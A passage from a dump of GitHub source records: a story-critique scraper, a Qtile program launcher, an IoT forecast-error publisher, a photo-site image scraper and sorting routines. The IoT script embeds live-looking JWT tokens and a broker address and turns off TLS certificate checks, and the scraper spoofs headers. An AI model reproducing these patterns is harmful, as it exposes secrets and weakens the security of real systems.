target_text,\n                comment_text\n            )\n            filled_critiques.append(fc)\n\n    insert_critiques(filled_critiques)\n\n    driver.quit()\n\ndef run_threaded_critique_scraper():\n    processes = []\n    for i in range(len(metadata_tables)):\n    #for i in range(1):\n        print(metadata_tables[i])\n        p = mp.Process(target=run_critique_scraper_manager, args=(metadata_tables[i],) )\n        processes.append(p)\n        p.start()\n\n    for p in processes:\n        p.join()\n\ndef serialize_stories_to_csv():\n    submission_csv_headers = ['submission_id', 'author', 'author_link', 'story_title',\n     'story_link', 'word_count', 'genre', 'crit_count', 'author_notes', 'story_text']\n\n    submission_csv = open('critiquecircle_submissions.csv', 'w', newline='')\n    sw = csv.writer(submission_csv)\n    sw.writerow(submission_csv_headers)\n\n    try:\n        for table_name in metadata_tables:\n            metadata = get_stored_metadata(table_name, status=\"true\")\n            for m in metadata:\n                sw.writerow([\n                    str(m.story_id).replace(\"\\n\", line_break_replacement).encode('utf-8'),\n                    m.author.replace(\"\\n\", line_break_replacement).encode('utf-8'),\n                    m.author_link.replace(\"\\n\", line_break_replacement).encode('utf-8'),\n                    m.story_title.replace(\"\\n\", line_break_replacement).encode('utf-8'),\n                    m.story_link.replace(\"\\n\", line_break_replacement).encode('utf-8'),\n                    m.word_count.replace(\"\\n\", line_break_replacement).encode('utf-8'),\n                    m.genre.replace(\"\\n\", line_break_replacement).encode('utf-8'),\n                    m.crit_count.replace(\"\\n\", line_break_replacement).encode('utf-8'),\n                    m.author_notes.replace(\"\\n\", line_break_replacement).encode('utf-8'),\n                    m.story_text.replace(\"\\n\", line_break_replacement).encode('utf-8')\n                ])\n    finally:\n        submission_csv.close()\n\ndef serialize_critiques_to_csv():\n    
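# mirrors serialize_stories_to_csv: dump every stored critique row to\n    # CSV, applying the same line-break substitution to each field\n    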
critique_csv_headers = ['comment_id', 'submission_id', 'critic_name', 'critic_link', 'critique_link', 'word_count', 'critique_type', 'story_target', 'target_comment']\n critique_csv = open('critiquecircle_critiques.csv', 'w', newline='')\n cw = csv.writer(critique_csv)\n cw.writerow(critique_csv_headers)\n\n try:\n critiques = get_stored_critiques()\n for c in critiques:\n cw.writerow([\n str(c.critique_id).replace(\"\\n\", line_break_replacement).encode('utf-8'),\n str(c.submission_id).replace(\"\\n\", line_break_replacement).encode('utf-8'),\n c.critic_name.replace(\"\\n\", line_break_replacement).encode('utf-8'),\n c.critic_link.replace(\"\\n\", line_break_replacement).encode('utf-8'),\n c.critique_link.replace(\"\\n\", line_break_replacement).encode('utf-8'),\n c.word_count.replace(\"\\n\", line_break_replacement).encode('utf-8'),\n c.critique_type.replace(\"\\n\", line_break_replacement).encode('utf-8'),\n c.story_target.replace(\"\\n\", line_break_replacement).encode('utf-8'),\n c.target_comment.replace(\"\\n\", line_break_replacement).encode('utf-8')\n ])\n finally:\n critique_csv.close()\n\ndef main():\n run_connection_health_check()\n for table_name in metadata_tables:\n create_story_metadata_table(table_name)\n create_critique_table()\n\n args = parser.parse_args()\n if args.skip_metadata is not True:\n run_threaded_metadata_scraper()\n\n if args.skip_critique is not True:\n run_threaded_critique_scraper()\n\n serialize_stories_to_csv()\n serialize_critiques_to_csv()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"flowpoint/CARP","sub_path":"scraper/critiquecircle.py","file_name":"critiquecircle.py","file_ext":"py","file_size_in_byte":14750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71239046329","text":"from GnuChanGUI import *\nimport subprocess\n\n\ndef main():\n default = GnuChanGUI(Title=\"GnuChan Program Runner\", Size=(610,600), resizable=True)\n default.Theme()\n\n defaultFont = \"Sans, 20\"\n\n gnuchanProgramList = [\" gRunner : Simple Dmenu Like Program\", \n \" gCalculator : Simple Calculator A+B=C\", \n \" gTimer : Simple Timer Program\",\n \" gTextEditor : Simple Text Editor\",\n \" gMusicPlayer : Simple Music Player\",\n \" gYTMV_Download : Youtube Music and Video Download\",\n \" gTerminal : Simple Terminal Emulator\"]\n \n gMenu = [[\"Info\", [\"GnuChanOS\", \"Youtube Channel\", \"Github Page\"]],\n [\"System\", [\"Exit\"]]]\n\n layout = [\n [default.GMenuForTheme(winMenu=gMenu, font=\"Sans, 16\")],\n [default.GText(title=\"This is Simple Program Runner\", font=defaultFont, position=\"center\", xStretch=True)],\n [default.GText(title=\"\", font=defaultFont, xStretch=True)],\n [default.GListBox(list=list(gnuchanProgramList), font=defaultFont, xStretch=True, yStretch=True, value=\"prunner\", position=\"center\", noScroolBar=True)],\n [default.GButton(\"Run\", xStretch=True, font=defaultFont)]\n ]\n\n default.GWindow(mainWindow=layout)\n default.GListBoxFixer(value=\"prunner\", border=0)\n\n while True:\n event, GetValues = default.window.read()\n if event == WIN_CLOSED:\n break\n if event == \"Exit\":\n break\n\n oldVar = str(GetValues[\"prunner\"])[2:]\n newVar = oldVar.split(\":\")[0].strip()\n\n\n if event == \"Run\":\n pyName = f\"{newVar}.py\"\n subprocess.Popen(f\"python ~/.config/qtile/gnuchanPrograms/{pyName}\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n break\n\n default.window.close()\nif __name__ == \"__main__\":\n main()\n\n\n\n\"\"\"\nxdsl 
numarası\n\n\"\"\"","repo_name":"gnuchanos/GnuchanOS","sub_path":"dotfiles/system/qtile/gnuchanPrograms/gGnuChanOS_Programs.py","file_name":"gGnuChanOS_Programs.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13691243932","text":"#!/usr/bin/python3\n\nimport json\nimport time\nimport math\nimport random\nimport statsmodels\nimport pandas as pd\nfrom datetime import datetime\n\nfrom scipy.stats import norm\nimport statsmodels.api as sm\n## for plot of models\nimport matplotlib.pyplot as plt\n## used in the part where RSME cost function is computed\nfrom math import sqrt\nfrom sklearn.metrics import mean_squared_error\n## the below is needed for AR models\nfrom statsmodels.tsa.ar_model import AutoReg\n## the below is needed for MA, ARMA, and ARIMA models\nfrom statsmodels.tsa.arima.model import ARIMA\nimport numpy as np\n#ignore harmless warning with code below\nimport warnings\n\nimport http.client\nfrom time import time\nfrom time import mktime\nimport ssl\n\nfrom minio import Minio\nimport pickle\nimport io\nimport paho.mqtt.client as mqtt\n\nEPSILON = 1e-10\n\ndef _percentage_error(actual: np.ndarray, predicted: np.ndarray):\n \"\"\"\n Percentage error\n Note: result is NOT multiplied by 100\n \"\"\"\n return _error(actual, predicted) / (actual + EPSILON)\n\ndef mape(actual: np.ndarray, predicted: np.ndarray):\n \"\"\"\n Mean Absolute Percentage Error\n Properties:\n + Easy to interpret\n + Scale independent\n - Biased, not symmetric\n - Undefined when actual[t] == 0\n Note: result is NOT multiplied by 100\n \"\"\"\n return np.mean(np.abs(_percentage_error(actual, predicted)))\n\ndef smape(actual: np.ndarray, predicted: np.ndarray):\n \"\"\"\n Symmetric Mean Absolute Percentage Error\n Note: result is NOT multiplied by 100\n \"\"\"\n return np.mean(2.0 * np.abs(actual - predicted) / ((np.abs(actual) + np.abs(predicted)) + EPSILON))\n\ndef _naive_forecasting(actual: np.ndarray, seasonality: int = 1):\n \"\"\" Naive forecasting method which just repeats previous samples \"\"\"\n return actual[:-seasonality]\n\ndef mase(actual: np.ndarray, predicted: np.ndarray, seasonality: int = 1):\n \"\"\"\n Mean Absolute Scaled Error\n Baseline (benchmark) is computed with naive forecasting (shifted by @seasonality)\n \"\"\"\n return mae(actual, predicted) / mae(actual[seasonality:], _naive_forecasting(actual, seasonality))\n\ndef _error(actual: np.ndarray, predicted: np.ndarray):\n \"\"\" Simple error \"\"\"\n return actual - predicted\n\ndef mae(actual: np.ndarray, predicted: np.ndarray):\n \"\"\" Mean Absolute Error \"\"\"\n return np.mean(np.abs(_error(actual, predicted)))\n\ndef mse(actual: np.ndarray, predicted: np.ndarray):\n \"\"\" Mean Squared Error \"\"\"\n return np.mean(np.square(_error(actual, predicted)))\n\n\ndef rmse(actual: np.ndarray, predicted: np.ndarray):\n \"\"\" Root Mean Squared Error \"\"\"\n return np.sqrt(mse(actual, predicted))\n\ndef compare(l1, l2, l3):\n count = 0\n for i in range(len(l1)):\n if(l1[i] < l2[i]):\n count+=1\n if(l1[i] < l3[i]):\n count+=1\n return count\n\ndef publishErr(sensor, error, timestamp):\n #function for bublishing count of ppl called every 15 mins\n client = mqtt.Client(\"platform\")\n client.username_pw_set(username=\"JWT\", 
password=\"eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpYXQiOjE2MjA4NzI2ODUsImlzcyI6ImlvdHBsYXRmb3JtIiwic3ViIjoiNTBfMTA3In0.x40nxuvC7xAGbXsuM0HsxE_uzya3oGFfu-pcI09e0e4h_tIuDn6em0NxyAmDjbjECKpQPoCuTlam9BRV8VSZkv3YwYNNATxesQJQ0XYHA9QUTdXzSZgefiLTE00nSq9gPD6O2dddwx6egAr9xcPqlOC6WXOU9mb1pnFoOv0BMymLvsSJndsB4bxMxi3CYrMirFRxFzPaGFZvwRNMmZZ5oGWtLhtLJ7cJ0t0wdD9jV1334AQfCayQvb9n7_6E3ruSZjfUdGMj5jV9lFaChfKjzs2yq15dDfKbbfOkDGwLPrpURH3Y65ycuPyaUn6TTz_EwUF2d5Ai5i2x5cJn_TSQ2vbDJw3BZxcBZ7NxiXoG00OwQ02QXMAryyYJ1SKdr_BPxyy2C2XeZFGg3ip42bUkn92tScFiQtzUp-WaQSFWiZK3D1sdJglPb6l1iEQCI7HfNk0g0ADlvKh_aGTcxy4sjFM69phDfj_UV7T5Of-BV1lk7mifC2tdg1rqqttCMQ9uNbnsrw6YcfsO896zr7uFDaVsG98veUCXQYtuXkbn3XWqxGUM13H6nb2ThlZn2dMxi5EsWKXktyQDtAmB_Sf4akU6MU4uW-d8QpzTv9wPaW2Qo1KagA6KIcdM9AjT9J8BsLd8kzMyuUIpVoioT5REp3kIRACzcLLiY6YxyXCy22U\")\n client.connect(\"131.159.35.132\", 1883)\n\n payload = {\n \"username\": \"group2_2021_ss\",\n sensor: error,\n \"device_id\": 107,\n \"timestamp\": timestamp\n }\n client.publish(\"50_107\", json.dumps(payload))\n print(\"Just published \" + str(payload) + \" to topic 50_107\")\n\ndef publishPred(count, timestamp):\n\n client = mqtt.Client(\"platform\")\n client.username_pw_set(username=\"JWT\", password=\"eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpYXQiOjE2MjA4NzI2ODUsImlzcyI6ImlvdHBsYXRmb3JtIiwic3ViIjoiNTBfMTA3In0.x40nxuvC7xAGbXsuM0HsxE_uzya3oGFfu-pcI09e0e4h_tIuDn6em0NxyAmDjbjECKpQPoCuTlam9BRV8VSZkv3YwYNNATxesQJQ0XYHA9QUTdXzSZgefiLTE00nSq9gPD6O2dddwx6egAr9xcPqlOC6WXOU9mb1pnFoOv0BMymLvsSJndsB4bxMxi3CYrMirFRxFzPaGFZvwRNMmZZ5oGWtLhtLJ7cJ0t0wdD9jV1334AQfCayQvb9n7_6E3ruSZjfUdGMj5jV9lFaChfKjzs2yq15dDfKbbfOkDGwLPrpURH3Y65ycuPyaUn6TTz_EwUF2d5Ai5i2x5cJn_TSQ2vbDJw3BZxcBZ7NxiXoG00OwQ02QXMAryyYJ1SKdr_BPxyy2C2XeZFGg3ip42bUkn92tScFiQtzUp-WaQSFWiZK3D1sdJglPb6l1iEQCI7HfNk0g0ADlvKh_aGTcxy4sjFM69phDfj_UV7T5Of-BV1lk7mifC2tdg1rqqttCMQ9uNbnsrw6YcfsO896zr7uFDaVsG98veUCXQYtuXkbn3XWqxGUM13H6nb2ThlZn2dMxi5EsWKXktyQDtAmB_Sf4akU6MU4uW-d8QpzTv9wPaW2Qo1KagA6KIcdM9AjT9J8BsLd8kzMyuUIpVoioT5REp3kIRACzcLLiY6YxyXCy22U\")\n client.connect(\"131.159.35.132\", 1883)\n\n payload = {\n \"username\": \"group2_2021_ss\",\n \"bestOnline\": count,\n \"device_id\": 107,\n \"timestamp\": timestamp\n }\n client.publish(\"50_107\", json.dumps(payload))\n print(\"Just published \" + str(payload) + \" to topic 50_107\")\n\n #publishing to sensor node\n client = mqtt.Client(\"sensor\")\n client.connect(\"test.mosquitto.org\")\n\n client.publish(\"/topic/nadija/predictions\", str(count).zfill(2))\n print(\"Just published \" + str(count).zfill(2) + \" to topic /topic/nadija/predictions\")\n\nCONSUMER_URL = 'iotplatform.caps.in.tum.de:443'\nDEV_JWT = 'eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpYXQiOjE2MjA5MTQ2OTMsImlzcyI6ImlvdHBsYXRmb3JtIiwic3ViIjoiNTBfODMifQ.mB9292Db6piVAOIcDnOKO5VFO6qWXmLNWuKOKrRN8FIjMnnfyO0XNOr9k2YjtDhHVyo8JI1igbDht8BRsre1zeM6JIsIwCpNZ9polPFb93hHf04xHyn0vsWw5JO2YeY4-ifyX-WifIgpwWfJvbaqZn_nY2P_thmqpH9tNKEOAkZVf3ovV_9WypzYH7z_mCfId0TI9W96L3LJtU6HEorT4A1ft5XXbZxgQZudzENoYg3J2UvFwtI42phMGbor4i9LrHCd9y6uv46s78-qnUgEWpd3qL91wdtJT0JFgkUlc8BwXyPIwJIQWb0-AR090Upv59aIkmIqig4LGO1ogX49eHcasw0Rzp1nT8aBWBY8lJjsZ3bk-rH2EYelr5RARK2q_zKQjDt9mFWTeERyeVmbpkEyur4hwbnse0zGee9hUgair3LCs-2AWYqCkXGqDjFzcAuuLCSCQtXqXw-hENtcnCo8_q_F9G_KzSNqRPZ1VViA_3a-0I7EALzNGsGdrUk_KCaVY2sXmBOX3Px4jVGxxE-IDJPK723DL1dQgHR_IICyNT-wdbaZMSU5GyevMOrCRyKEXnvlSWakXqJagdmw5JVRivcdJ8aNnMMZgllbXYW7wJDTZYwMeyZjqIBkNBfsVuhGGjknsugW4FUZnoqwXS3QuUCgtD7pZt4Kaz_9CZI'\n\nsensorID = 1248\nbatchSize = 100\nsearchPath = '/api/consumers/consume/' + str(sensorID) + '/_search?' 
#base path - search all\ncountPath = '/api/consumers/consume/' + str(sensorID) + '/_count?' #base path - count all\n\ngenerated_ts = pd.DataFrame(columns = ['time', 'count'])\n\nts = time()\ncurTs = int(ts - (ts % 60))\n\n#we get the counts published in the last 15 minutes if there is more counts, we take last one of them\n#we get data from last 15 minutes because in that time interval there must be at least one prediction, \n#since we push preditions on every 15 minutes even if there are no enter/leave commands\n\nweekAgoTs = int(curTs - 15 * 60 * 60)\nsQuery = 'q=timestamp:[' + str(weekAgoTs*1000) + '%20TO%20' + str(curTs*1000) + ']'\nsearchPath = searchPath + sQuery\ncountPath = countPath + sQuery\n\n# Get the data\nconsumerConn = http.client.HTTPSConnection(CONSUMER_URL,context = ssl._create_unverified_context())\nconsumerConn.connect()\n\nscroll_id = ''\nwhile True:\n # Slicing requests\n if scroll_id == '':\n searchPath = searchPath + '&scroll=3m&size=' + str(batchSize)\n consumerConn.request('GET', searchPath, '', { \"Content-Type\": \"application/x-www-form-urlencoded\", \"Authorization\": \"Bearer \" + DEV_JWT })\n else:\n searchPath = '/api/consumers/consume/' + str(sensorID) + '/_search/scroll?size=' + str(batchSize)\n consumerConn.request('GET', searchPath, '{\"scroll\":\"3m\",\"scroll_id\":\"' + scroll_id + '\"}',\n { \"Content-Type\": \"application/json\", \"Authorization\": \"Bearer \" + DEV_JWT })\n iotPlResp = consumerConn.getresponse()\n rawData = iotPlResp.read()\n respData = json.loads(rawData)\n respData = respData[\"body\"]\n #print(scroll_id)\n if scroll_id == '':\n scroll_id = respData[\"_scroll_id\"]\n observationsArray = respData[\"hits\"][\"hits\"]\n\n if len(observationsArray) == 0:\n break\n\n for observation in observationsArray:\n timestamp_s = int(observation['_source']['timestamp'] / 1000)\n count = int(observation['_source']['value'])\n cur_date = datetime.fromtimestamp(timestamp_s)\n df_row = pd.DataFrame([[cur_date, count]], columns=['time', 'count'])\n generated_ts = generated_ts.append(df_row)\n\nconsumerConn.close()\n\ngenerated_ts.index = generated_ts.time\ngenerated_ts.index.name = 'index'\n\ngenerated_ts = generated_ts.sort_index()\ngenerated_ts[\"numOfObs\"] = range(0, len(generated_ts))\n\nprint(generated_ts)\n\n#in the following code, we read prediction from our textfile for each of the models,\n#compare it to the real prediction we obtained with the previous code and calculate errors, which we publish\n\nwith open('/home/ubuntu/week7task/arima_forecasts.txt') as f:\n line = f.readline()\n\nprint(line)\nline = line.split()\nprint(line)\n\narimaTimestamp = int(line[0])\narimaCount = int(line[1])\n\nprint(generated_ts.time[generated_ts.time < datetime.fromtimestamp(arimaTimestamp/1000)])\n\ntimestamps = generated_ts.time[generated_ts.time < datetime.fromtimestamp(arimaTimestamp/1000)]\n\nif(len(timestamps) != 0):\n\n print(type(timestamps[len(timestamps) - 1]))\n\n print(generated_ts.loc[timestamps[len(timestamps) - 1]])\n\n ts = timestamps[len(timestamps) - 1]\n\n realCount = generated_ts.loc[ts][\"count\"]\n\n predictedCount = np.array(arimaCount)\n realCount = np.array(realCount)\n\n print(type(predictedCount))\n\n print(realCount)\n print(type(realCount))\n\n maeErr = mae(realCount, predictedCount)\n print(\"mae\" + str(maeErr))\n\n rmseErr = rmse(realCount, predictedCount)\n print(\"rmse\" + str(rmseErr))\n\n mapeErr = mape(realCount, predictedCount)\n print(\"mape\" + str(mapeErr))\n\n smapeErr = smape(realCount, predictedCount)\n 
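# smape is symmetric in actual and predicted, so a large prediction on a\n    # small true count is not penalized more than the reverse\n    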
print(\"smape\" + str(smapeErr))\n\n #MASE cannot be computed for just one point since it looks at lag 1\n\n #if(len(realCount) == 1):\n # maseErr = mae(realCount, predictedCount)\n #else:\n # maseErr = mase(realCount, predictedCount)\n #maseErr = mase(np.array([2]), np.array([1]), 0)\n #print(\"mase\" + str(maseErr))\n\n #push all the metrics to platform\n publishErr(\"mae_arima\", maeErr, arimaTimestamp)\n publishErr(\"rmse_arima\", rmseErr, arimaTimestamp)\n publishErr(\"mape_arima\", mapeErr, arimaTimestamp)\n publishErr(\"smape_arima\", smapeErr, arimaTimestamp)\n #publish(\"mase\", maseErr, timestamp)\n arimaErrors = [maeErr, rmseErr, mapeErr, smapeErr]\n\nwith open('/home/ubuntu/week7task/lstm_forecasts.txt') as f:\n line = f.readline()\n\nprint(line)\nline = line.split()\nprint(line)\n\nlstmTimestamp = int(line[0])\nlstmCount = int(line[1])\n\nprint(generated_ts.time[generated_ts.time < datetime.fromtimestamp(lstmTimestamp/1000)])\n\ntimestamps = generated_ts.time[generated_ts.time < datetime.fromtimestamp(lstmTimestamp/1000)]\n\nif(len(timestamps) != 0):\n\n print(type(timestamps[len(timestamps) - 1]))\n\n print(generated_ts.loc[timestamps[len(timestamps) - 1]])\n\n ts = timestamps[len(timestamps) - 1]\n\n realCount = generated_ts.loc[ts][\"count\"]\n\n predictedCount = np.array(lstmCount)\n realCount = np.array(realCount)\n\n print(type(predictedCount))\n\n print(realCount)\n print(type(realCount))\n\n maeErr = mae(realCount, predictedCount)\n print(\"mae\" + str(maeErr))\n\n rmseErr = rmse(realCount, predictedCount)\n print(\"rmse\" + str(rmseErr))\n\n mapeErr = mape(realCount, predictedCount)\n print(\"mape\" + str(mapeErr))\n\n smapeErr = smape(realCount, predictedCount)\n print(\"smape\" + str(smapeErr))\n\n #if(len(realCount) == 1):\n # maseErr = mae(realCount, predictedCount)\n #else:\n # maseErr = mase(realCount, predictedCount)\n #maseErr = mase(np.array([2]), np.array([1]), 0)\n #print(\"mase\" + str(maseErr))\n\n #push all the metrics to platform\n publishErr(\"mae_lstm\", maeErr, lstmTimestamp)\n publishErr(\"rmse_lstm\", rmseErr, lstmTimestamp)\n publishErr(\"mape_lstm\", mapeErr, lstmTimestamp)\n publishErr(\"smape_lstm\", smapeErr, lstmTimestamp)\n #publish(\"mase\", maseErr, timestamp)\n lstmErrors = [maeErr, rmseErr, mapeErr, smapeErr]\n\nwith open('/home/ubuntu/week7task/prop_forecasts.txt') as f:\n line = f.readline()\n\nprint(line)\nline = line.split()\nprint(line)\n\npropTimestamp = int(line[0])\npropCount = int(line[1])\n\nprint(generated_ts.time[generated_ts.time < datetime.fromtimestamp(propTimestamp/1000)])\n\ntimestamps = generated_ts.time[generated_ts.time < datetime.fromtimestamp(propTimestamp/1000)]\n\nif(len(timestamps) != 0):\n\n print(type(timestamps[len(timestamps) - 1]))\n\n print(generated_ts.loc[timestamps[len(timestamps) - 1]])\n\n ts = timestamps[len(timestamps) - 1]\n\n realCount = generated_ts.loc[ts][\"count\"]\n\n predictedCount = np.array(propCount)\n realCount = np.array(realCount)\n\n print(type(predictedCount))\n\n print(realCount)\n print(type(realCount))\n\n maeErr = mae(realCount, predictedCount)\n print(\"mae\" + str(maeErr))\n\n rmseErr = rmse(realCount, predictedCount)\n print(\"rmse\" + str(rmseErr))\n\n mapeErr = mape(realCount, predictedCount)\n print(\"mape\" + str(mapeErr))\n\n smapeErr = smape(realCount, predictedCount)\n print(\"smape\" + str(smapeErr))\n\n #if(len(realCount) == 1):\n # maseErr = mae(realCount, predictedCount)\n #else:\n # maseErr = mase(realCount, predictedCount)\n #maseErr = mase(np.array([2]), 
np.array([1]), 0)\n    #print(\"mase\" + str(maseErr))\n\n    #push all the metrics to platform\n    publishErr(\"mae_prop\", maeErr, propTimestamp)\n    publishErr(\"rmse_prop\", rmseErr, propTimestamp)\n    publishErr(\"mape_prop\", mapeErr, propTimestamp)\n    publishErr(\"smape_prop\", smapeErr, propTimestamp)\n    #publish(\"mase\", maseErr, timestamp)\n    propErrors = [maeErr, rmseErr, mapeErr, smapeErr]\n\n#we made a function for comparing errors, which gives each model a score\narimaScore = compare(arimaErrors, lstmErrors, propErrors)\nlstmScore = compare(lstmErrors, arimaErrors, propErrors)\npropScore = compare(propErrors, lstmErrors, arimaErrors)\n\nprint(arimaScore)\nprint(lstmScore)\nprint(propScore)\n\n#the model with the biggest score wins\nif(lstmScore >= arimaScore and lstmScore >= propScore):\n    print(\"lstm wins\")\n    publishPred(lstmCount, lstmTimestamp)\nelif(propScore >= arimaScore and propScore >= lstmScore):\n    print(\"prop wins\")\n    publishPred(propCount, propTimestamp)\nelse:\n    print(\"arima wins\")\n    publishPred(arimaCount, arimaTimestamp)\n\n#remove the consumed forecasts from the txt files to free space\nwith open('/home/ubuntu/week7task/arima_forecasts.txt', 'r') as fin:\n    data = fin.read().splitlines(True)\nwith open('/home/ubuntu/week7task/arima_forecasts.txt', 'w') as fout:\n    fout.writelines(data[1:])\n\nwith open('/home/ubuntu/week7task/lstm_forecasts.txt', 'r') as fin:\n    data = fin.read().splitlines(True)\nwith open('/home/ubuntu/week7task/lstm_forecasts.txt', 'w') as fout:\n    fout.writelines(data[1:])\n\nwith open('/home/ubuntu/week7task/prop_forecasts.txt', 'r') as fin:\n    data = fin.read().splitlines(True)\nwith open('/home/ubuntu/week7task/prop_forecasts.txt', 'w') as fout:\n    fout.writelines(data[1:])\n","repo_name":"lizardqueen98/InternetOfThingsPraktikum","sub_path":"Code/Virtual edge code/metricsEval.py","file_name":"metricsEval.py","file_ext":"py","file_size_in_byte":15481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"72621647608","text":"#! 
/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author: \"fraser\"\n# Date: 2018-6-17\n# goodies\n\nimport asyncio\nimport aiohttp\nfrom aiohttp import web\nimport urllib.request as request\nfrom bs4 import BeautifulSoup as bs\nimport json\nimport os\nimport uuid\nimport multiprocessing\nimport threading\nfrom multiprocessing import Queue, Pool, Process\n\ncount = 1\n\n\nasync def fetch(url):\n    async with aiohttp.ClientSession() as session:\n        async with session.get(url) as response:\n            if response.status == 200:\n                return await response.text()\n            else:\n                raise Exception(\"this is an error\")\n\n\nclass parseListPage():\n    '''\n    Fetch the category image list from a first-level page\n    '''\n\n    def __init__(self, page_str):\n        self.page_str = page_str\n\n    def __enter__(self):\n        page_str = self.page_str\n        page = bs(page_str, 'html.parser')\n        a = page.find('ul', attrs={'id': 'pins'}).find_all('li')\n        images = []\n        for child in a:\n            obj = child.find_next('a')\n            time = child.find_next('span', attrs={'class': 'time'}).text\n            url = obj.get('href')\n            images.append({'url': url, 'name': obj.find(\n                'img').get('alt'), 'time': time})\n        return images\n\n    def __exit__(self, exc_type, exc_val, exc_tb):\n        pass\n\n\nasync def praseImg(url, path):\n    '''\n    Scrape a single image\n    '''\n    try:\n        html = await fetch(url)\n        page = bs(html, 'html.parser')\n        print(url)\n        img = page.find(\n            'div', attrs={'class': 'main-image'}).find('img').get('src')\n        await downImg(img, path)\n    except Exception as e:\n        print(e)\n        raise Exception(e)\n\n\nasync def praseImgs(url):\n    '''\n    Scrape a second-level page for image URLs\n    '''\n    try:\n        imgs = []\n        print('-------------- \\033[1;35m starting scrape of second-level page %s \\033[0m!' % url)\n        imgs.append(url)\n        html = await fetch(url)\n        page = bs(html, 'html.parser')\n        node = page.find('div', attrs={'class': 'pagenavi'}).find_all('a')\n        if len(node)<4:\n            return None\n        a = node[-2].get('href').split('/')\n\n        for i in range(2, int(a[-1])+1):\n            imgs.append(url+'/'+str(i))\n        print('-------------- \\033[1;35m finished scrape of second-level page %s \\033[0m!' % url)\n        return {'folder': url.split('/')[-1], 'urls': imgs}\n    except Exception as e:\n        print(e)\n        raise Exception(e)\n\n\nasync def downImg(url, path):\n    global count\n    count += 1\n    print('-------------', path+'\\\\'+url.split('/')[-1])\n    if os.path.exists(path+'\\\\'+url.split('/')[-1]):\n        return\n    header = {\n        'Referer': url,\n        'X-DevTools-Emulate-Network-Conditions-Client-Id': 'DB3AC464E06BFD77CD35121525D27455',\n        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36'}\n    print('----------------- \\033[1;35m starting download of %s \\033[0m!' % url)\n    req = request.Request(url, headers=header)\n    data = request.urlopen(req).read()\n    print(' ---------------- \\033[1;35m finished download of %s \\033[0m!' 
% url)\n    with open(path+'\\\\'+url.split('/')[-1], 'wb') as f:\n        print(count, '----', threading.current_thread())\n        f.write(data)\n\n\nasync def main(url):\n    # print(await praseImgs('http://www.mzitu.com/137510'))\n    # await downImg('http://i.meizitu.net/2018/04/22b01.jpg', '11.jpg')\n    # request.urlretrieve('http://i.meizitu.net/2018/06/13c02.jpg', '11.jpg')\n\n    html = await fetch(url)\n    print('starting scrape of page %s' % url)\n    with parseListPage(html) as tmp:\n        print('finished scrape of page %s' % url)\n        for item in tmp:\n            obj = await praseImgs(item['url'])\n\n            if obj is None:\n                continue\n            o_path = 'd:\\\\work\\\\image\\\\%s' % item['time']\n            path = o_path+'\\\\%s' % obj['folder']\n            if not os.path.exists(o_path):\n                os.mkdir(o_path)\n            if not os.path.exists(path):\n                os.mkdir(path)\n            for str_url in obj['urls']:\n                await praseImg(str_url, path)\n\n\n\ndef process_start(*pages):\n    loop = asyncio.get_event_loop()\n    tasks = [main(url) for url in pages]\n    loop.run_until_complete(asyncio.wait(tasks))\n    loop.close()\n\ndef task_start():\n    pages = []\n    # pages.append('http://www.mzitu.com')\n    # p = Process(target=process_start, args=pages)\n    # p.start()\n    for page in range(20, 21):\n        pages=[]\n        pages.append(\"http://www.mzitu.com/page/%s\" % page)\n        p = Process(target=process_start, args=pages)\n        p.start()\n\n\nif __name__ == '__main__':\n    task_start()\n\n\n# loop = asyncio.get_event_loop()\n# tasks = [main(url) for url in pages]\n# loop.run_until_complete(asyncio.wait(tasks))\n# loop.close()\n","repo_name":"FraserPeng/python-learning","sub_path":"shikaku/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":4869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"22076848181","text":"def insertion(values):\n\tsorted = []\n\twhile len(values):\n\t\tvalue = values.pop()\n\t\tif len(sorted) == 0 or sorted[len(sorted) - 1] <= value:\n\t\t\t# If the sorted array has no items yet or the current value is larger than all others\n\t\t\t# (the largest value will always be the highest index)\n\t\t\t# just append the value to the end of the sorted array\n\t\t\tsorted.append(value)\n\t\t\tcontinue\n\t\telse:\n\t\t\t# inject into sorted accordingly\n\t\t\tfor index, compare in enumerate(sorted):\n\t\t\t\tif compare >= value:\n\t\t\t\t\t# If the value is less than or equal to what we're comparing to, \n\t\t\t\t\t# insert the value where we're at in the sorted array.\n\t\t\t\t\tsorted.insert(index, value)\n\t\t\t\t\tbreak\n\t\t\t\tif index == len(sorted) - 1:\n\t\t\t\t\t# If we're at this point then we've gone through the full array and the current value is the lowest of the bunch. 
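(In practice the compare branch above already catches a new minimum, so this path is a defensive fallback.)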
\n\n\ndef selection(values):\n\tmin = 0\n\tfor index, value in enumerate(values):\n\t\t# set current index as lowest value\n\t\tmin = index\n\t\tfor subIndex, compare in enumerate(values[index+1:]):\n\t\t\t# iterate through remaining items and find the smallest\n\t\t\tif compare < values[min]:\n\t\t\t\t# Reset min - make sure to add index since we're looping through a sub-list.\n\t\t\t\t# Make sure to also add 1 since we're comparing 1 step ahead of the current outer loop index.\n\t\t\t\tmin = subIndex + index + 1\n\t\tif min > index:\n\t\t\t# if there was a lower value found later in the list, swap the items\n\t\t\tvalues[index], values[min] = values[min], values[index]\n\treturn values","repo_name":"michaelpidde/sorting","sub_path":"sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"34060096133","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 23 20:02:13 2019\n\n@author: 